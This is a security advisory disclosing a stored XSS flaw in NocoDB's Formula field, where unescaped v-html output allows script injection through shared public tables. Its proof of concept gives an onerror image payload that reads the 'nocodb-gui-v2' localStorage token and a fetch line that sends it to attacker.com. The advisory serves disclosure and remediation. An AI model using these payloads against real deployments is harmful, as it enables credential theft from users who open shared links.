GHSA-h6r4-xvw6-jc5h

### Summary A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.

### Details The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag <a> with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.

### PoC Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T} Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX) Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage

The attackers can use the fetch([http://attacker.com/?localStorage.getItem('nocodb-gui-v2')](http://attacker.com/?localStorage.getItem(%27nocodb-gui-v2%27))) to replace the alert and then steal the victims' credentials in their attacker.com website.

### Impact Stealing the credentials of NocoDB user that clicks the malicious link.